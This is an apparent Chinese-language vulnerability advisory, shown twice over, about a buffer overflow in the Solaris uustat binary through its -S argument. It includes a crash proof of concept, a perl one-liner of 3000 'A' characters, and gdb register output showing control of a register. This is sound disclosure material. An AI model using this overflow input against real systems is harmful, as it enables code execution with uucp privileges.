VULHUB ™

Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。 Solaris的/usr/bin/uustat二进制程序中存在缓冲区溢出漏洞，成功利用这个漏洞的攻击者可以完全控制执行函数的返回地址，以uucp用户权限执行任意代码。 如果\"-S\"命令行参数后的字符串长度大于或等于1152字节的话，就可能导致二进制程序崩溃。 下面实例显示缓冲区被溢出，o1寄存器被字母A完全覆盖： bash-2.03\\% ls -l /usr/bin/uustat ---s--x--x 1 uucp uucp 62012 Jan 17 16：07 uustat bash-2.03$ /usr/bin/uustat -S `perl -e \'\'print \"A\"x3000\'\'` Segmentation Fault bash-2.03$ (gdb) info registers g0 0x0 0 g1 0xff315e98 -13541736 g2 0x1cc00 117760 g3 0x440 1088 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0xff3276a8 -13470040 o1 0x41414141 1094795585 ...

Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。 Solaris的/usr/bin/uustat二进制程序中存在缓冲区溢出漏洞，成功利用这个漏洞的攻击者可以完全控制执行函数的返回地址，以uucp用户权限执行任意代码。 如果\"-S\"命令行参数后的字符串长度大于或等于1152字节的话，就可能导致二进制程序崩溃。 下面实例显示缓冲区被溢出，o1寄存器被字母A完全覆盖： bash-2.03\\% ls -l /usr/bin/uustat ---s--x--x 1 uucp uucp 62012 Jan 17 16：07 uustat bash-2.03$ /usr/bin/uustat -S `perl -e \'\'print \"A\"x3000\'\'` Segmentation Fault bash-2.03$ (gdb) info registers g0 0x0 0 g1 0xff315e98 -13541736 g2 0x1cc00 117760 g3 0x440 1088 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0xff3276a8 -13470040 o1 0x41414141 1094795585 ...